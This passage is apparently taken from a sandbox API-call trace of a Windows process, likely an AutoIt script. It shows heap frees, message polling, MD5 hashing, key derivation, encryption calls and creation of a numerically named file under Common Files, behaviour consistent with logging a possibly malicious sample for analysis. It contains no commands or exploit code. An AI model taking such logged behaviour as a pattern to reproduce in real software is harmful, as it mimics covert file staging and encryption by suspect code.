hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2390 | out: hHeap=0x8a0000) returned 1 [0244.173] PeekMessageW (in: lpMsg=0x87f1cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f1cc) returned 0 [0244.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2320 | out: hHeap=0x8a0000) returned 1 [0244.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2390 | out: hHeap=0x8a0000) returned 1 [0244.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db060 | out: hHeap=0x8a0000) returned 1 [0244.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7f80 | out: hHeap=0x8a0000) returned 1 [0244.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23a0 | out: hHeap=0x8a0000) returned 1 [0244.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23a0 | out: hHeap=0x8a0000) returned 1 [0244.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23a0 | out: hHeap=0x8a0000) returned 1 [0244.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23a0 | out: hHeap=0x8a0000) returned 1 [0244.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23a0 | out: hHeap=0x8a0000) returned 1 [0244.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23a0 | out: hHeap=0x8a0000) returned 1 [0244.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23a0 | out: hHeap=0x8a0000) returned 1 [0244.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23a0 | out: hHeap=0x8a0000) returned 1 [0244.173] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.174] CryptAcquireContextA (in: phProv=0x87f1a0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87f1a0*=0x9c1ae0) returned 1 [0244.175] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.175] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.175] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0244.175] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0244.175] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0244.175] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.175] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.176] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.176] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0244.176] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0244.176] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0244.176] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.176] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.176] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.176] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.176] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0244.176] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.176] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.176] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0244.176] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0244.177] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0244.177] PeekMessageW (in: lpMsg=0x87eecc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eecc) returned 0 [0244.177] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0244.177] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0244.177] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0244.177] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0244.177] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0244.177] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0244.177] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.177] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.177] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.177] PeekMessageW (in: lpMsg=0x87eedc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eedc) returned 0 [0244.177] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0244.177] PeekMessageW (in: lpMsg=0x87eedc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eedc) returned 0 [0244.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.178] CryptCreateHash (in: hProv=0x9c1ae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87ef10 | out: phHash=0x87ef10) returned 1 [0244.178] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.178] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.178] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.178] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.178] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0244.178] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.178] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.178] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.178] PeekMessageW (in: lpMsg=0x87eedc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eedc) returned 0 [0244.178] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.179] CryptHashData (hHash=0xc31c88, pbData=0xa2f1a0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0244.179] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.179] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.179] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.179] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.179] PeekMessageW (in: lpMsg=0x87eedc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eedc) returned 0 [0244.179] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0244.179] PeekMessageW (in: lpMsg=0x87eedc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eedc) returned 0 [0244.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.180] CryptDeriveKey (in: hProv=0x9c1ae0, Algid=0x660e, hBaseData=0xc31c88, dwFlags=0x1, phKey=0x87ef10 | out: phKey=0x87ef10*=0xc31d08) returned 1 [0244.180] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.180] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.180] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.180] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.180] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.181] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.181] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0244.181] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.181] CryptDestroyHash (hHash=0xc31c88) returned 1 [0244.181] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.181] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.181] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.181] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.181] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.182] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370" (normalized: "c:\\progra~2\\common~1\\2620738370"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0244.182] GetLastError () returned 0x2 [0244.182] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.182] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.183] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.185] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370" (normalized: "c:\\progra~2\\common~1\\26207383702620738370"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x698 [0244.186] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.186] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.186] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.186] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.186] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.186] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.186] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.186] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0244.187] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.187] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.187] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0244.187] PeekMessageW (in: lpMsg=0x87f02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f02c) returned 0 [0244.187] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0244.187] PeekMessageW (in: lpMsg=0x87f02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f02c) returned 0 [0244.187] PeekMessageW (in: lpMsg=0x87f02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f02c) returned 0 [0244.187] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.187] PeekMessageW (in: lpMsg=0x87e9dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9dc) returned 0 [0244.187] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.187] CryptGetKeyParam (in: hKey=0xc31d08, dwParam=0x7, pbData=0x8e2370, pdwDataLen=0x87e9f8, dwFlags=0x0 | out: pbData=0x8e2370*=0x660e, pdwDataLen=0x87e9f8*=0x4) returned 1 [0244.188] PeekMessageW (in: lpMsg=0x87f02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f02c) returned 0 [0244.188] PeekMessageW (in: lpMsg=0x87f02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f02c) returned 0 [0244.188] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.188] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.188] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.188] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.188] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.188] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.188] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0244.188] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0244.188] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0244.188] PeekMessageW (in: lpMsg=0x87eecc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eecc) returned 0 [0244.188] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0244.188] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0244.189] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0244.189] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0244.189] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0244.189] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0244.189] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.189] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.189] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.189] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.189] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.189] PeekMessageW (in: lpMsg=0x87eedc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eedc) returned 0 [0244.189] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.189] CryptEncrypt (in: hKey=0xc31d08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87ef28*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87ef28*=0x10) returned 1 [0244.189] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.190] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.190] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.190] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.190] CharLowerBuffW (in: lpsz="byte[17]", cchLength=0x8 | out: lpsz="byte[17]") returned 0x8 [0244.190] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.190] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.190] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.190] PeekMessageW (in: lpMsg=0x87eedc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eedc) returned 0 [0244.190] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.190] CryptEncrypt (in: hKey=0xc31d08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc6b610*, pdwDataLen=0x87ef28*=0x0, dwBufLen=0x10 | out: pbData=0xc6b610*, pdwDataLen=0x87ef28*=0x10) returned 1 [0244.190] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.190] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.191] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.191] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.191] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.191] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0244.191] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0244.191] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0244.191] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0244.191] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0244.191] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0244.191] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0244.191] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0244.191] PeekMessageW (in: lpMsg=0x87eecc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eecc) returned 0 [0244.191] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0244.191] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0244.192] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, 